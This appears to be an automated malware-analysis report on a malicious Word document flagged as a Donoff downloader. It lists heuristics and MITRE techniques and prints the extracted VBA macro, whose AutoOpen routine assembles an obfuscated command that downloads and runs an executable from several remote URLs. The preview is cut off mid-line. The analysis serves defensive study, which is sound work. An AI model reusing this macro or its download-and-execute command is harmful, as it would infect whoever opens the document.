Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro uses the Shell() function to execute a command, likely to download and run a second-stage payload. The ClamAV detection 'Doc.Downloader.Donoff-6691329-0' further supports its role as a downloader.
Heuristics (6)
- ClamAV: Doc.Downloader.Donoff-6691329-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Donoff-6691329-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4973 bytes | 44c14b5d4d26b53c47b1044ff51224e3d261f21a289b8d163442dba7eb674abe |

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "lHqtzFhEFiwAt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Set Ykcpi = LwmXI
Set AMHfNb = KrOuRl
Set AZXWc = WiTsi
Set bwdAzV = kOPzmz
Set iYzTC = NzlATd
Set njKTPQ = QQmaS
Shell ITDFuC + avuhKNvqPR + WflcjPVF + vvdubJNVMPf + XqHqMlUh + wNzszfrMwb, Format(0)
Set SkQFRH = tkiDs
Set LnSBT = OwSCU
Set GjFSi = jXXZHT
End Sub
Attribute VB_Name = "DkNKEipUEt"
Function ITDFuC()
On _
Error _
Resume _
Next
Set rWvJf = YWZswB
Set zJIzQP = wLvdJ
ZJGzXQjTwi = Format(Chr(13 + 6 + 18 + 4 + 58)) + "md " + "/V^:" + "^O" + "/" + Format(Chr(9 + 4 + 12 + 2 + 40)) + Format(Chr(4 + 1 + 5 + 1 + 23)) + "^s^" + "e" + "^t ^jU^"
Set phXXRO = FwpvLW
LfzIU = "8n=^ ^" + " ^ ^ " + " ^ " + " " + "^ ^ ^"
Set UUpOcj = DabbkP
iupwMQCuKQ = " ^ " + "}^}{" + "^" + "h" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "^t^a" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "^}"
Set BVbNdj = PGFkU
Set sNWNF = BJQRwU
Set mqqzZi = Ifkai
TMfpi = ";^" + "k" + "a^" + "e" + "rb^;Fv" + "K$^" + " " + "^m^e" + "^t^I-" + "^e^k^" + "ovnI"
Set QckpM = abwuB
Set KncTvZ = JCXiA
wkLPR = "^;)^Fv" + "^K$^ " + ",Jl" + "^I$(el" + "i^" + "Fda^o" + "^" + "lnwo^" + "D."
ITDFuC = ZJGzXQjTwi + LfzIU + iupwMQCuKQ + TMfpi + wkLPR
Set kovqt = YDUVqa
Set NiqRm = EKTiw
Set ZrhpCP = psGJX
Set CHXuLi = iQjPOX
Set rmvNjR = SIAAQj
Set hSkjQS = bVULL
End Function
Function avuhKNvqPR()
On _
Error _
Resume _
Next
Set PppiSY = zQzTt
ZmONEusS = "^S" + "^zv" + "^${yr" + "^t{)z^" + "B" + "i$ n^"
Set DPPPwj = tafFZ
Set aiPah = qzJws
fZjkKdhuXc = "i^" + " ^Jl" + "^" + "I$(h" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "^" + "aer^" + "o^f;" + "^'^ex^e" + ".'^+Q"
Set jlaaRt = kEwSX
Set rwsCf = szhovr
Set zKBZr = ILDpSw
cbLczOmTX = "^Q^i" + "$+" + "^'^" + "\" + "'+" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "^i" + "^" + "lb" + "u^p:" + "vn^e^$^" + "=Fv" + "^K$" + "^;" + "'"
Set kIfsAW = VAvhUi
Set aAscDu = fwqWMG
Set TikCd = ZvPGFf
VzKXAH = "^68^7^'" + " =" + " ^QQ^i" + "$" + ";)'@"
Set jWZLur = ncDQz
Set PCRHF = TSPKn
fnLGFnWPcB = "'(t" + "i" + "lp^S^." + "'^bd^i" + "/^u" + "r.n^" + "ola^s^u" + "ra" + "^"
avuhKNvqPR = ZmONEusS + fZjkKdhuXc + cbLczOmTX + VzKXAH + fnLGFnWPcB
Set mvrkm = jfDafw
End Function
Function WflcjPVF()
On _
Error _
Resume _
Next
Set AHuwDj = TDsNA
Set rpRjO = htkLMj
Set lOuWX = Maiiz
DYofWXX = "p//^" + ":^p" + "tt^h@M" + "R" + "h" + "^FO^Qa" + "R/^zi^b" + "^.^a^k"
Set HYZws = CSlwzk
swozWraQEv = "o^oo/" + "/:^ptt" + "^h@5" + "^l^" + "k/rb" + ".^m^o" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "." + "e^tro" + "^p^"
Set IipLuc = VwQJiM
Set QAjbS = iTOHK
Set YTOBLI = QqJjl
Set dwZnF = oKKjUt
qMhoklWvUX = "u^" + "stn" + "//:p^tt" + "h^@0" + "/m^"
Set RTkwqf = hEbIm
Set QMhZa = kYwPp
Set jKbDQ = VIrEXF
Set Grtps = RVbwm
Set wIiXb = FEcdzD
RHzsEjDhn = "o" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "^" + ".^" + "pma^t^" + "s" + "d" + "^aors^s" + "or" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "//^:" + "^ptt^h"
Set DOpvl = RBvnJ
Set iiWhhT = MSzut
Set cjZlW = sVsmE
siiPSLPwi = "@^k/^m^" + "o" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "^.pue" + "^" + "kam^" + "e" + "r^o^o" + "m" + "//" + ":p" + "tt" + "h'^" + "="
Set hmiYO = cjtOX
Set wIEVqE = ophKW
Set iKbkq = vTsrRS
imjBtXZUro = "z" + "B^i^$" + "^;tnei^" + "l" + Format(Chr(9 + 4 + 12 + 2 + 40)) + "be" + "^" + "W^.t^eN" + "^" + " " + "^t" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "^" + "e" + "j" + "bo^-w"
Set qwLhV = OzTlhC
Set qraAkW = GEjpqz
Set RFAFnp = nWuBu
LrYCHCY = "^en=S^" + "zv" + "^$" + " ^l^l^e" + "^" + "h" + "^sre^wo" + "p" + "&"
Set HPCTzL = bpkLcO
Set AuvBc = THhjK
HrfCMELzSn = "&^f^o" + "r /^L %" + "^x ^" + "in (^3" + "^40," + "^-^" + "1^,^0" + ")^" + "d" + "^" + "o s^e" +
... (truncated)